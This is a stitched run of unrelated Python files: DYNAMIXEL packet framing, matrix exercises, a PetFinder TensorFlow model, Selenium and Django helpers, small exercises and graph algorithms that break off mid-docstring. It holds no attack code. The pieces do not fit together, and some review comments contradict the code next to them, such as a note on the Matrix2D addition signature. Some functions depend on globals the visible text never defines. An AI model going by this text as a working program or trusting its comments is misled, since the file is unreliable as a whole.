import struct
import perilib
class RobotisDynamixel2Packet(perilib.StreamPacket):
    """Packet framing for the ROBOTIS DYNAMIXEL Protocol 2.0 serial stream:
    byte-stuffed payload wrapped in a header and a CRC16 footer."""

    # packet direction identifiers and their display/context strings
    TYPE_INSTRUCTION = 0
    TYPE_STATUS = 1
    TYPE_STR = ["instruction", "status"]
    TYPE_ARG_CONTEXT = ["outgoing_args", "incoming_args"]

    # Lookup table for the table-driven CRC16 in update_crc (the footer
    # comment below calls this the "CRC16 IBM mechanism").
    crc_table = [
        0x0000, 0x8005, 0x800F, 0x000A, 0x801B, 0x001E, 0x0014, 0x8011,
        0x8033, 0x0036, 0x003C, 0x8039, 0x0028, 0x802D, 0x8027, 0x0022,
        0x8063, 0x0066, 0x006C, 0x8069, 0x0078, 0x807D, 0x8077, 0x0072,
        0x0050, 0x8055, 0x805F, 0x005A, 0x804B, 0x004E, 0x0044, 0x8041,
        0x80C3, 0x00C6, 0x00CC, 0x80C9, 0x00D8, 0x80DD, 0x80D7, 0x00D2,
        0x00F0, 0x80F5, 0x80FF, 0x00FA, 0x80EB, 0x00EE, 0x00E4, 0x80E1,
        0x00A0, 0x80A5, 0x80AF, 0x00AA, 0x80BB, 0x00BE, 0x00B4, 0x80B1,
        0x8093, 0x0096, 0x009C, 0x8099, 0x0088, 0x808D, 0x8087, 0x0082,
        0x8183, 0x0186, 0x018C, 0x8189, 0x0198, 0x819D, 0x8197, 0x0192,
        0x01B0, 0x81B5, 0x81BF, 0x01BA, 0x81AB, 0x01AE, 0x01A4, 0x81A1,
        0x01E0, 0x81E5, 0x81EF, 0x01EA, 0x81FB, 0x01FE, 0x01F4, 0x81F1,
        0x81D3, 0x01D6, 0x01DC, 0x81D9, 0x01C8, 0x81CD, 0x81C7, 0x01C2,
        0x0140, 0x8145, 0x814F, 0x014A, 0x815B, 0x015E, 0x0154, 0x8151,
        0x8173, 0x0176, 0x017C, 0x8179, 0x0168, 0x816D, 0x8167, 0x0162,
        0x8123, 0x0126, 0x012C, 0x8129, 0x0138, 0x813D, 0x8137, 0x0132,
        0x0110, 0x8115, 0x811F, 0x011A, 0x810B, 0x010E, 0x0104, 0x8101,
        0x8303, 0x0306, 0x030C, 0x8309, 0x0318, 0x831D, 0x8317, 0x0312,
        0x0330, 0x8335, 0x833F, 0x033A, 0x832B, 0x032E, 0x0324, 0x8321,
        0x0360, 0x8365, 0x836F, 0x036A, 0x837B, 0x037E, 0x0374, 0x8371,
        0x8353, 0x0356, 0x035C, 0x8359, 0x0348, 0x834D, 0x8347, 0x0342,
        0x03C0, 0x83C5, 0x83CF, 0x03CA, 0x83DB, 0x03DE, 0x03D4, 0x83D1,
        0x83F3, 0x03F6, 0x03FC, 0x83F9, 0x03E8, 0x83ED, 0x83E7, 0x03E2,
        0x83A3, 0x03A6, 0x03AC, 0x83A9, 0x03B8, 0x83BD, 0x83B7, 0x03B2,
        0x0390, 0x8395, 0x839F, 0x039A, 0x838B, 0x038E, 0x0384, 0x8381,
        0x0280, 0x8285, 0x828F, 0x028A, 0x829B, 0x029E, 0x0294, 0x8291,
        0x82B3, 0x02B6, 0x02BC, 0x82B9, 0x02A8, 0x82AD, 0x82A7, 0x02A2,
        0x82E3, 0x02E6, 0x02EC, 0x82E9, 0x02F8, 0x82FD, 0x82F7, 0x02F2,
        0x02D0, 0x82D5, 0x82DF, 0x02DA, 0x82CB, 0x02CE, 0x02C4, 0x82C1,
        0x8243, 0x0246, 0x024C, 0x8249, 0x0258, 0x825D, 0x8257, 0x0252,
        0x0270, 0x8275, 0x827F, 0x027A, 0x826B, 0x026E, 0x0264, 0x8261,
        0x0220, 0x8225, 0x822F, 0x022A, 0x823B, 0x023E, 0x0234, 0x8231,
        0x8213, 0x0216, 0x021C, 0x8219, 0x0208, 0x820D, 0x8207, 0x0202
    ]

    def prepare_buffer_after_building(self):
        """Frame self.buffer (the built payload) into a full wire packet:
        stuff the payload, prepend the header, append the CRC16 footer."""
        # perform byte stuffing on payload: an extra 0xFD is inserted after
        # any 0xFF 0xFF 0xFD run so payload bytes cannot mimic the header
        stuffed_buffer = []
        stuffing_needed = False
        # NOTE(review): the run-tracker is seeded with the instruction byte
        # unconditionally, so len(seen) == 1 from the start even when the
        # instruction is not 0xFF (the `len(seen) == 0` branch below is then
        # unreachable for the first payload byte). The instruction byte does
        # precede the payload on the wire, but confirm this seeding against
        # the Protocol 2.0 byte-stuffing rules.
        seen = [self.metadata["instruction"]]
        for b in self.buffer:
            stuffed_buffer.append(b)
            if b == 0xFF and len(seen) == 0:
                seen.append(b)
            elif b == 0xFF and len(seen) == 1:
                seen.append(b)
            elif b == 0xFD and len(seen) == 2:
                # stuff an extra 0xFD byte and reset status
                stuffing_needed = True
                stuffed_buffer.append(0xFD)
                seen = []
            else:
                # pattern broken, reset
                seen = []
        # replace original buffer with stuffed one (only if anything changed)
        if stuffing_needed:
            self.buffer = bytes(stuffed_buffer)
        # build header (SOF, servo ID, length, and instruction data)
        # length field counts instruction (1) + stuffed payload + CRC (2)
        header = struct.pack("<5BHB",
            0xFF, 0xFF, 0xFD, 0x00,
            self.metadata["id"], len(self.buffer) + 3, self.metadata["instruction"])
        # prepend header to buffer
        self.buffer = header + self.buffer
        # calculate CRC16-IBM and build footer (CRC16 IBM mechanism)
        # CRC covers the entire packet built so far, header included
        self.metadata["crc"] = self.update_crc(0, self.buffer)
        self.buffer = self.buffer + struct.pack("<H", self.metadata["crc"])

    def update_crc(self, crc_accum, data_blk):
        """Fold every byte of data_blk into the 16-bit accumulator crc_accum
        using crc_table; seed with 0 for a fresh packet."""
        for b in data_blk:
            i = ((crc_accum >> 8) ^ b) & 0xFF
            crc_accum = ((crc_accum << 8) ^ RobotisDynamixel2Packet.crc_table[i]) & 0xFFFF
        return crc_accum
|
import numpy as np
import operator
def twodim(mat):
    """Describe a matrix by its outer length (1-3 rows); None otherwise."""
    descriptions = {
        1: 'Matriz de 1 elemento',
        2: 'Matriz de 2 elementos',
        3: 'Matriz de 3 elementos',
    }
    return descriptions.get(len(mat))
def twodim_recursivo(mat1):
    """Return len(mat1), bumped up to a minimum of 1 (equivalent to the
    original while-loop, which only ran while the length was below 1)."""
    return max(len(mat1), 1)
# Count the rows and columns of a matrix given as a list of lists: the outer
# list length is the row count, and the average inner-list length gives the
# column count (all inner lists are assumed to have the same length).
def rowcolumn(mat):
    """Return (rows, cols); cols is a float (total cells / rows), 0 if empty."""
    rows = len(mat)
    total_cells = sum(len(row) for row in mat)
    cols = total_cells / rows if rows else 0
    return rows, cols
def compare(mat1, mat2):
    """Print every row of mat1, then every row of mat2 (debug helper)."""
    for row in [*mat1, *mat2]:
        print(row)
# Small fixture lists for quick manual experimentation.
a = list(range(1, 4))
b = list(range(4, 7))
print(a)
def addition(mat1, mat2):
    """Element-wise sum of two equal-shaped matrices (lists of lists).

    Generalized from the original, which wrote into a hard-coded 2x3 result
    buffer and therefore failed for any other shape; this version works for
    any pair of matrices with matching dimensions.

    Sample input: [[1,2,3],[4,5,6]], [[7,8,9], [10,11,12]]
    Sample output: [[8,10,12],[14,16,18]]
    """
    return [[x + y for x, y in zip(row1, row2)]
            for row1, row2 in zip(mat1, mat2)]
#print(addition([[1, 2, 3], [4, 5, 6]], [[7, 8, 9], [10, 11, 12]]))
class Matrix2D:
    """A minimal 2-D matrix wrapper over a list of lists."""

    def __init__(self, mat):
        # Store the raw matrix and derive its dimensions via self.rowcolumn,
        # exactly as the exercise comments instruct (the original left
        # self.rows / self.cols unset).
        self.mat = mat
        self.rows, self.cols = self.rowcolumn(mat)

    def twodim(self, mat):
        """Describe `mat` by its outer length (1-3 rows); None otherwise."""
        len_mat = len(mat)
        if len_mat == 1:
            return 'Matriz de 1 elemento'
        elif len_mat == 2:
            return 'Matriz de 2 elementos'
        elif len_mat == 3:
            return 'Matriz de 3 elementos'

    def rowcolumn(self, mat):
        """Return (rows, cols); cols is total cells / rows (0 when empty)."""
        rows = len(mat)
        total_cells = 0
        for row in mat:
            total_cells += len(row)
        return rows, (total_cells / rows if rows else 0)

    def compare(self, mat1, mat2):
        """True when mat1 and mat2 have the same number of rows."""
        return len(mat1) == len(mat2)

    def addition(self, matrix):
        """Element-wise sum with another Matrix2D; returns a new Matrix2D.

        Fixes the original block, which defined addition twice (the first
        definition was dead code calling np.add with a single tuple), used a
        (self, mat1, mat2) signature that made the module-level call
        `a.addition(b)` raise TypeError, and returned a plain list instead of
        a Matrix2D as the exercise comments require.
        """
        if not self.compare(self.mat, matrix.mat):
            raise ValueError('matrices must have the same number of rows')
        result = [[x + y for x, y in zip(row1, row2)]
                  for row1, row2 in zip(self.mat, matrix.mat)]
        return Matrix2D(result)
# NOTE(review): this passes a single Matrix2D to addition() and reads .mat off
# the result; with the last addition(self, mat1, mat2) definition above it
# raises TypeError — confirm the intended signature is addition(self, matrix)
# returning a Matrix2D, as the class's own comments describe.
print(Matrix2D([[1,2,3],[4,5,6]]).addition(Matrix2D([[7,8,9],[10,11,12]])).mat)
|
import itertools
import matplotlib
import matplotlib.pyplot as plt
import numpy as np
import pandas as pd
import tensorflow as tf
from sklearn.ensemble import IsolationForest
from sklearn.model_selection import train_test_split
from sklearn.preprocessing import MinMaxScaler
# CONSTANTS
ITERATIONS = 10000                     # training steps passed to regressor.fit
LABEL = 'AdoptionSpeed'                # target column in the PetFinder data
HIDDEN_UNITS = [200, 100, 50, 25, 12]  # layer widths for the DNNRegressor
TRAINING_TEST_SPLIT = 0.20             # hold-out fraction for evaluation
RANDOM_NUMBER_SEED = 42                # seed shared by the split and IsolationForest
def prepare_data(data):
    """Clean and discretize the raw PetFinder dataframe.

    Mutates `data` in place (drops identifier columns, bins numeric columns),
    then splits it into continuous and categorical parts with missing values
    filled.

    Returns (final_data, data_categorical, data_continuous, pet_id):
      final_data       -- continuous and categorical columns merged on index
      data_categorical -- object-dtype columns, NaNs replaced with 'NONE'
      data_continuous  -- non-object columns, NaNs replaced with 0
      pet_id           -- the original PetID column, captured before the drop
    """
    pet_id = data.PetID
    # Remove identifier / free-text features the model should not see
    data.drop(['RescuerID', 'Description', 'PetID', 'State'], axis=1, inplace=True)
    # Discretize skewed numeric features into ordinal bins
    data['Age'] = pd.cut(data['Age'], [-1, 2, 3, 6, 255], labels=[0, 1, 2, 3])
    data['Fee'] = pd.cut(data['Fee'], [-1, 50, 100, 200, 3000], labels=[0, 1, 2, 3])
    data['PhotoAmt'] = pd.cut(data['PhotoAmt'], [-1, 1, 5, 10, 100], labels=[0, 1, 2, 3])
    data['VideoAmt'] = pd.cut(data['VideoAmt'], [-1, 1, 100], labels=[0, 1])
    # Reduce Name to a presence flag: 1 if the pet has a name, 0 otherwise
    data.loc[data['Name'].notnull(), 'Name'] = 1
    data.loc[data['Name'].isnull(), 'Name'] = 0
    # Split by dtype and fill missing values. Plain assignment replaces the
    # original inplace fillna on a derived frame, which is fragile under
    # pandas copy-on-write semantics; the resulting values are identical.
    data_continuous = data.select_dtypes(exclude=['object']).fillna(0)
    data_categorical = data.select_dtypes(include=['object']).fillna('NONE')
    final_data = data_continuous.merge(data_categorical, left_index=True, right_index=True)
    return final_data, data_categorical, data_continuous, pet_id
def input_function(data_set, training=True):
    """Build the TF1-style feature dict (and label tensor) for tf.contrib.learn.

    Relies on the module-level globals `features_continuous`,
    `features_categorical` and LABEL being set (they are assigned in the
    __main__ block below) — this function is not usable standalone.
    Continuous columns become dense constant tensors; categorical columns
    become rank-2 SparseTensors with one string value per row, the layout the
    contrib embedding columns expect.

    Returns (feature_cols, label) when `training` is True, else feature_cols.
    """
    continuous_cols = {key: tf.constant(data_set[key].values) for key in features_continuous}
    categorical_cols = {
        key: tf.SparseTensor(indices=[[i, 0] for i in range(data_set[key].size)],
                             values=data_set[key].values,
                             dense_shape=[data_set[key].size, 1])
        for key in features_categorical}
    # Merges the dictionaries
    feature_cols = dict(list(continuous_cols.items()) + list(categorical_cols.items()))
    if training:
        # Convert the label column into a constant Tensor
        label = tf.constant(data_set[LABEL].values)
        return feature_cols, label
    return feature_cols
if __name__ == '__main__':
    # NOTE(review): this pipeline targets TensorFlow 1.x — tf.logging and
    # tf.contrib.{layers,learn} were removed in TF 2.x.
    tf.logging.set_verbosity(tf.logging.INFO)
    # Import and split
    train, train_categorical, train_continuous, train_pet_id = prepare_data(pd.read_csv('../all/train.csv'))
    test, test_categorical, test_continuous, test_pet_id = prepare_data(pd.read_csv('../all/test/test.csv'))
    # Remove the outliers: keep only rows the forest labels as inliers
    # (prediction == 1) and realign all three frames on a fresh index
    clf = IsolationForest(max_samples=100, random_state=RANDOM_NUMBER_SEED)
    clf.fit(train_continuous)
    y_no_outliers = clf.predict(train_continuous)
    y_no_outliers = pd.DataFrame(y_no_outliers, columns=['Top'])
    train_continuous = train_continuous.iloc[y_no_outliers[y_no_outliers['Top'] == 1].index.values]
    train_continuous.reset_index(drop=True, inplace=True)
    train_categorical = train_categorical.iloc[y_no_outliers[y_no_outliers['Top'] == 1].index.values]
    train_categorical.reset_index(drop=True, inplace=True)
    train = train.iloc[y_no_outliers[y_no_outliers['Top'] == 1].index.values]
    train.reset_index(drop=True, inplace=True)
    # Extract columns (these globals are read by input_function above)
    columns = list(train_continuous.columns)
    features_continuous = list(train_continuous.columns)
    features_continuous.remove(LABEL)
    features_categorical = list(train_categorical.columns)
    # Extract matrices
    matrix_train = np.matrix(train_continuous)
    matrix_test = np.matrix(test_continuous)
    # NOTE(review): matrix_test_no_label is built from TRAIN data (the test
    # frame has no label column) — confirm this is the intended fit source
    # for test_scaler below.
    matrix_test_no_label = np.matrix(train_continuous.drop(LABEL, axis=1))
    matrix_y = np.array(train.AdoptionSpeed)
    # Scale data
    y_scaler = MinMaxScaler()
    y_scaler.fit(matrix_y.reshape(matrix_y.shape[0], 1))
    train_scaler = MinMaxScaler()
    train_scaler.fit(matrix_train)
    test_scaler = MinMaxScaler()
    test_scaler.fit(matrix_test_no_label)
    matrix_train_scaled = pd.DataFrame(train_scaler.transform(matrix_train), columns=columns)
    test_matrix_scaled = pd.DataFrame(test_scaler.transform(matrix_test), columns=features_continuous)
    train[columns] = pd.DataFrame(train_scaler.transform(matrix_train), columns=columns)
    test[features_continuous] = test_matrix_scaled
    # Extract continuous and categorical features into tf.contrib columns:
    # real-valued for numerics, hashed sparse + 16-dim embedding for strings
    engineered_features = []
    for continuous_feature in features_continuous:
        engineered_features.append(tf.contrib.layers.real_valued_column(continuous_feature))
    for categorical_feature in features_categorical:
        sparse_column = tf.contrib.layers.sparse_column_with_hash_bucket(categorical_feature, hash_bucket_size=1000)
        engineered_features.append(tf.contrib.layers.embedding_column(sparse_id_column=sparse_column,
                                                                      dimension=16,
                                                                      combiner='sum'))
    # Split training set data between train and test
    x_train, x_test, y_train, y_test = train_test_split(train[features_continuous + features_categorical],
                                                        train[LABEL],
                                                        test_size=TRAINING_TEST_SPLIT,
                                                        random_state=RANDOM_NUMBER_SEED)
    # Convert back to DataFrame (the label is merged back in so that
    # input_function can read data_set[LABEL])
    y_train = pd.DataFrame(y_train, columns=[LABEL])
    x_train = pd.DataFrame(x_train, columns=features_continuous + features_categorical) \
        .merge(y_train, left_index=True, right_index=True)
    y_test = pd.DataFrame(y_test, columns=[LABEL])
    x_test = pd.DataFrame(x_test, columns=features_continuous + features_categorical) \
        .merge(y_test, left_index=True, right_index=True)
    # Deep neural network model
    regressor = tf.contrib.learn.DNNRegressor(feature_columns=engineered_features,
                                              activation_fn=tf.nn.relu,
                                              hidden_units=HIDDEN_UNITS)
    # Train model
    regressor.fit(input_fn=lambda: input_function(x_train), steps=ITERATIONS)
    # Evaluate model (training=True so the label is fed for the loss)
    evaluation = regressor.evaluate(input_fn=lambda: input_function(x_test, training=True), steps=1)
    # Predictions
    y = regressor.predict(input_fn=lambda: input_function(x_test))
    predictions = list(itertools.islice(y, x_test.shape[0]))
    predictions = pd.DataFrame(y_scaler.inverse_transform(np.array(predictions).reshape(len(predictions), 1)))
    # Compute accuracy
    rounded_predictions = predictions.round()
    # NOTE(review): train_scaler was fit on the continuous-only matrix
    # (len(columns) wide), but x_test here also carries categorical and label
    # columns — confirm the widths line up for inverse_transform.
    reality = pd.DataFrame(train_scaler.inverse_transform(x_test), columns=[columns])[LABEL]
    matching = rounded_predictions.where(reality.values == rounded_predictions.values)
    accuracy = matching.count()[0] / len(reality) * 100
    # Print metrics
    print('Final loss on testing set: {0:f}'.format(evaluation['loss']))
    print('Final accuracy: {0:.2f}%'.format(accuracy))
    # Plot final results
    matplotlib.rc('xtick', labelsize=30)
    matplotlib.rc('ytick', labelsize=30)
    fig, ax = plt.subplots(figsize=(50, 40))
    plt.style.use('ggplot')
    plt.plot(predictions.values, reality.values, 'ro')
    plt.xlabel('Predictions', fontsize=30)
    plt.ylabel('Reality', fontsize=30)
    plt.title('Predictions x Reality on dataset Test', fontsize=30)
    ax.plot([reality.min(), reality.max()], [reality.min(), reality.max()], 'k--', lw=4)
    plt.show()
|
import time
from selenium.webdriver.common.by import By
from selenium.webdriver.support.wait import WebDriverWait
from wheel.signatures import assertTrue
from features.pages.page_selector import LoginPageLocator, OrganizationPopup, HomePageLocator
from selenium.webdriver.support import expected_conditions as EC
def login(context, email, password):
    """Fill the sign-in form with `email`/`password` and submit it."""
    browser = context.browser
    browser.find_element(*LoginPageLocator.EMAIL_FIELD).send_keys(email)
    browser.find_element(*LoginPageLocator.PASSWORD_FIELD).send_keys(password)
    browser.find_element(*LoginPageLocator.SIGNIN_BUTTON).click()
# Organization
def clear_organizations(context):
    """Delete every organization listed on the page, one at a time.

    Keeps the original fixed sleeps so the UI can settle between steps.
    """
    org_total = len(context.browser.find_elements(*OrganizationPopup.ORGS_COUNT))
    if org_total == 0:
        print("List is empty")
        return
    for _ in range(org_total):
        time.sleep(1)
        # Always open the first organization in the list; the list shrinks
        # after each deletion.
        context.browser.find_element(
            By.XPATH,
            "//div[@class='columns-wrapper']/div[1]//a[@class='organization-name']").click()
        time.sleep(0.5)
        context.browser.find_element(By.XPATH, ".//span[text()='Delete organization']").click()
        time.sleep(0.5)
        context.browser.find_element(By.XPATH, ".//a[text()='Delete organization']").click()
        time.sleep(0.5)
        context.browser.find_element(By.XPATH, ".//a[text()='Delete']").click()
        time.sleep(1.5)
def create_organization(context, name):
    """Create an organization called `name` with a fixed test description.

    Fixes two issues in the original: the create button was located twice
    (once for the assert, again for the click), and the presence check used
    wheel.signatures.assertTrue — an API removed from modern `wheel`
    releases. A plain assert on the already-located element is equivalent
    and dependency-free.
    """
    context.browser.find_element(*HomePageLocator.My_organizations_btn).click()
    time.sleep(1)
    create_btn = context.browser.find_element(*HomePageLocator.Create_new_organization_btn)
    assert create_btn  # the button must be present before we click it
    create_btn.click()
    time.sleep(5)
    context.browser.find_element(*OrganizationPopup.TITLE).send_keys(name)
    context.browser.find_element(*OrganizationPopup.DESC).send_keys("Test organization")
    context.browser.find_element(*OrganizationPopup.SUBMIT).click()
    time.sleep(1)
#!/usr/bin/python3
"""
Start link class to table in database.

Usage: ./script.py <mysql user> <password> <database name>
"""
import sys

from model_state import Base, State
from sqlalchemy import (create_engine)

if __name__ == "__main__":
    # Fix: the original read argv[1..3] without the `sys.` prefix, raising
    # NameError before anything ran (only the sys module is imported).
    usr = sys.argv[1]
    pwd = sys.argv[2]
    db_name = sys.argv[3]
    engine = create_engine('mysql+mysqldb://{}:{}@localhost/{}'.
                           format(usr, pwd, db_name), pool_pre_ping=True)
    Base.metadata.create_all(engine)
|
# coding: utf-8
# In your favorite language:
# let's take the challenge!!
# Read a count from stdin and print that many asterisks on one line.
count = int(input())
print("*" * count)
|
import numpy as np

"""task 1"""
# 3x3 matrix of ones
m = np.ones((3, 3))
"""task 2"""
# append a row of 2s, then a column of 3s (final shape: 4x4)
m = np.concatenate([m, np.full((1, 3), 2.0)], axis=0)
m = np.concatenate([m, np.full((4, 1), 3.0)], axis=1)
print(m)
|
# Read whitespace-separated integers, print them sorted, then report the
# smallest and largest values.
a = [int(token) for token in
     input("please input numbers with space between them \n").split()]
a.sort()
print(" ".join(str(value) for value in a))
print("The smallest number among the input is", a[0], "and the largest is", a[-1])
import os
import jieba
def cn_ci(dir_path):
    """Segment every *.txt file under dir_path with jieba, then overwrite the
    file in place with its space-separated, order-preserving unique terms."""
    for file_name in os.listdir(dir_path):
        if ".txt" not in file_name:
            continue
        file_path = "/".join([dir_path, file_name])
        with open(file_path, "rb") as source:
            raw_text = source.read()
        # Truncate and rewrite the same file, mirroring the original flow.
        with open(file_path, "w", encoding='utf-8') as target:
            tokens = [t for t in jieba.cut(raw_text) if len(str(t).strip()) != 0]
            unique_tokens = dict.fromkeys(tokens).keys()
            target.write(' '.join(unique_tokens) + ' ')
#cn_ci("cn_texts")
|
# Read an integer and report whether it is even.
x = int(input("Insert number "))
print("Number is even" if x % 2 == 0 else "Number is not even")
|
# Superclass collecting the factors common to every employee type.
class Employee:
    """Base employee: stores a name and prints a work-report prefix."""

    def __init__(self, name):
        self.name = name

    def doWork(self):
        # end='' so a subclass can append its own task description.
        print('Employee {0}는 '.format(self.name), end='')
# Subclass: name the superclass in parentheses to inherit from it.
class RegularEmployee(Employee):
    """Office employee: performs general administrative work."""

    def __init__(self, name, age):
        super().__init__(name)
        self.age = age

    def doWork(self):
        super().doWork()
        print('일반적인 사무업무 수행')
class SalesEmployee(Employee):
    """Sales employee: performs sales work."""

    def __init__(self, name, age):
        super().__init__(name)
        self.age = age

    def doWork(self):
        super().doWork()
        print('영업업무를 수행')
def main():
    """Create one employee of each kind and have them report their work."""
    for employee in (RegularEmployee('Hong', 25), SalesEmployee('Kim', 30)):
        employee.doWork()


if __name__ == '__main__':
    main()
"""
all mixins are defined here
"""
from django.contrib.auth.views import redirect_to_login
from django.contrib.auth.models import Group
from django.http import Http404
class RequireLoginMixin:
    """Redirect anonymous users to the login page before running the view."""

    def dispatch(self, request, *args, **kwargs):
        if request.user.is_authenticated:
            return super().dispatch(request, *args, **kwargs)
        return redirect_to_login(request.get_full_path())
class IsTSO:
    """
    User should belong to the TSO group to access this webpage
    """
    def dispatch(self, request, *args, **kwargs):
        if request.user.groups.filter(name='tso').exists():
            return super().dispatch(request, *args, **kwargs)
        raise Http404(
            f'User not allowed to access {request.get_full_path()}')
class IsTMO:
    """
    User should belong to the TMO group to access this webpage
    """
    def dispatch(self, request, *args, **kwargs):
        if request.user.groups.filter(name='tmo').exists():
            return super().dispatch(request, *args, **kwargs)
        raise Http404(
            f'User not allowed to access {request.get_full_path()}')
class IsRDO:
    """
    User should belong to the RDO group to access this webpage
    (the original docstring said TMO — a copy-paste slip; the check is 'rdo')
    """
    def dispatch(self, request, *args, **kwargs):
        if request.user.groups.filter(name='rdo').exists():
            return super().dispatch(request, *args, **kwargs)
        raise Http404(
            f'User not allowed to access {request.get_full_path()}')
class IsPAO:
    """
    User should belong to the PAO group to access this webpage
    (the original docstring said TMO — a copy-paste slip; the check is 'pao')
    """
    def dispatch(self, request, *args, **kwargs):
        if request.user.groups.filter(name='pao').exists():
            return super().dispatch(request, *args, **kwargs)
        raise Http404(
            f'User not allowed to access {request.get_full_path()}')
|
from bs4 import BeautifulSoup
import requests
import urllib.request

# Fetch the Bing wallpaper page, pull the first image inside the 'panel'
# div, and save it locally as bing.jpg.
page = requests.get('https://bing.wallpaper.pics/')
dom = BeautifulSoup(page.text, 'lxml')
image_url = dom.find('div', class_='panel').find('img')['src']
urllib.request.urlretrieve(image_url, 'bing.jpg')
from django.forms import ModelForm
from myapp.models import *
# Create the form class: a ModelForm over the Measurement model (imported
# from myapp.models) exposing only the measurement type and its value.
class MeasurementForm(ModelForm):
    class Meta:
        # Fields rendered/validated by the form; all other Measurement
        # fields are excluded.
        model = Measurement
        fields = ['msmtType', 'value', ]
#Uses python3
import sys
import queue
import math
#=============================================
sample_undigraph0 = """
4 5
2 1
4 3
1 4
2 4
3 2
"""
# 1 3 Test Source and Terminus
sample_undigraph1 = """
4 4
1 2
4 1
2 3
3 1
2 4
"""
sample_undigraph2 = """
5 4
5 2
1 3
3 4
1 4
3 5
"""
sample_digraph1 = """
5 8
4 3
1 2
3 1
3 4
2 5
5 1
5 4
5 3
"""
sample_digraph2 = """
5 1
4 3
"""
sample_wdigraph1 = """
4 4
1 2 1
4 1 2
2 3 2
1 3 5
1 3
"""
sample_wdigraph2 = """
5 9
1 2 4
1 3 2
2 3 2
3 2 1
2 4 2
3 5 4
5 4 1
2 5 3
3 4 4
1 5
"""
sample_wdigraph3 = """
3 3
1 2 7
1 3 5
2 3 2
3 2
"""
sample_wdigraph4 = """
3 3
2 3 9
1 3 5
1 2 -2
"""
#=============================================
def DFS(adj): # adj is the list of vertices in graph G
    """DFS is Depth First Search of (undirected) graph.
    adj is adjacency list for graph.
    Returns number of distinct connected components."""
    # NOTE(review): relies on module-level `visited` (indexable, pre-sized to
    # len(adj)) and a function `explore()` — neither is defined in the
    # visible part of this file; confirm they exist before calling.
    global cc
    global visited
    for v in range(len(adj)): # adjacency list has length == number of nodes
        visited[v] = False
    cc = 1
    for v in range(len(adj)):
        if not visited[v]:
            explore(v)
            # increment connected component count after each return from explore()
            cc = cc + 1 # only increment for each unvisited node explored here
    # NOTE(review): cc starts at 1 and is incremented once per component, so
    # the returned value is (number of components + 1) — confirm intended.
    return cc
#=============================================
# Queue in Python can be implemented by the following ways <https://www.geeksforgeeks.org/queue-in-python/>:
# list:
# q = [] # initialize
# with append(), pop(). But this is slow
# collections.deque
# from collections import deque # double-ended queue
# q = deque() # Initializing a queue
# q.append(x) # Adding elements to a queue
# print(q.popleft()) # Removing elements from a queue
# queue.Queue
# from queue import Queue
# q = Queue(maxsize = 3) # Initializing a queue and setting maxsize
# queue.maxsize # size limit for queue
# queue.empty() # Return True if the queue is empty, False otherwise.
# queue.full() # Return True if there are maxsize items in the queue. If the queue was initialized with maxsize=0 (the default), then full() never returns True.
# queue.qsize() # Return the number of items in the queue. If no free slot is immediately available, raise QueueFull.
# queue.put_nowait(item) # Put an item into the queue without blocking.
# queue.get_nowait() # Return an item if one is immediately available, else raise QueueEmpty.
# queue.put(item) # Put an item into the queue. If the queue is full, wait until a free slot is available before adding the item.
# queue.get() # Remove and return an item from the queue. If queue is empty, wait until an item is available.
def enqueue(Q, x):
    """Put x on queue Q and return Q; echoes the queue when `debug` is set."""
    Q.put_nowait(x)
    if debug:
        print("enqueue", x, ":", end=" ")
        show_queue(Q)
    return Q
def dequeue(Q):
    """Pop the oldest item off Q; returns the pair (Q, item).
    Echoes the remaining queue when `debug` is set."""
    item = Q.get_nowait()
    if debug:
        print("dequeue :", end=" ")
        show_queue(Q)
    return (Q, item)
def show_queue(Q):
    """Print the queue's size and its contents on a single line."""
    contents = list(Q.queue)
    print("(Size of the queue:", Q.qsize(), ")", end=" ")
    if contents:
        print(*contents, end=" ")
    print()
#=============================================
def BFS(adj, s):
    """Breadth First Search over adjacency list `adj` from start node `s`.

    Returns a list of hop distances from `s`; unreachable nodes keep the
    sentinel value 2*len(adj) ("approximately infinite", larger than any
    real path length). Running time is O(|V| + |E|).
    Assumes nodes are numbered sequentially 0..n-1.
    """
    node_count = len(adj)
    unreached = 2 * node_count  # sentinel: also means "not yet visited"
    dist = [unreached] * node_count
    dist[s] = 0  # zero distance to the start node
    Q = queue.Queue(maxsize=node_count + 1)  # sufficiently large FIFO queue
    enqueue(Q, s)
    while not Q.empty():
        Q, u = dequeue(Q)
        for v in adj[u]:  # every edge (u, v)
            if dist[v] == unreached:  # first time v is reached
                Q = enqueue(Q, v)
                dist[v] = dist[u] + 1
    return dist
def distanceBFS(adj, s, t):
    """Hop distance from s to t via BFS, or -1 when t is unreachable."""
    dist = BFS(adj, s)
    # Any real distance is at most len(adj) - 1; the unreachable sentinel is
    # 2 * len(adj), so this threshold cleanly separates the two cases.
    return dist[t] if dist[t] < (len(adj) + 1) else -1
def parse_weighted_digraph_input_to_G_s_and_t(inputtext):
    """
    Parse the course-standard weighted digraph text format.

    First line: "n m" (vertex and edge counts); then m lines "a b w"
    describing edge a->b with weight w; the final line is "s t"
    (source and target). Vertices are converted from 1-based to 0-based.

    Returns:
    adj  - adjacency list (list of neighbor lists, one per node)
    cost - edge weights organized in the same positions as adj
    s    - source node (origin)
    t    - terminal node (destination)
    """
    numbers = list(map(int, inputtext.split()))
    n, m = numbers[0], numbers[1]
    adj = [[] for _ in range(n)]
    cost = [[] for _ in range(n)]
    # Edge triples occupy numbers[2 : 2 + 3*m] as a flat (a, b, w) sequence.
    for k in range(m):
        a, b, w = numbers[2 + 3 * k: 5 + 3 * k]
        adj[a - 1].append(b - 1)
        cost[a - 1].append(w)
    s, t = numbers[2 + 3 * m] - 1, numbers[3 + 3 * m] - 1
    return (adj, cost, s, t)
"""**Dijkstra(G, S)**
for all u∈V:
dist[u] ← ∞, prev[u] ← nil
dist[S] ← 0
H ← MakeQueue(V ) {dist-values as keys} # this is the Unknown region, not(R)
while H is not empty:
u ← ExtractMin(H)
# Lemma: When a node u is selected via ExtractMin, dist[u] = d(S,u).
for all (u,v)∈ E: # relax _outgoing_ edges from u
if dist[v] > dist[u]+w(u,v):
dist[v] ← dist[u] + w(u, v)
prev[v] ← u
ChangePriority(H , v , dist [v])
"""
def make_queueAlt(V, ds):
    """Build a queue as a list of [vertex, distance-estimate] pairs."""
    return [[v, ds[v]] for v in V]
def make_queue(V):
    """Build a queue as a plain list of the vertices in V."""
    return list(V)
def extract_minOld(H):
    """
    def extract_minOld(H)
    extracts the element (vertex) from list `H` with minimum distance estimate (upper bound).
    Assumes the queue/list has pairs of vertices and distances.
    Returns the pair [vertex, distance]
    """
    # NOTE(review): legacy helper, apparently superseded by extract_min
    # below. `approxInf` is not defined in this function or at module level
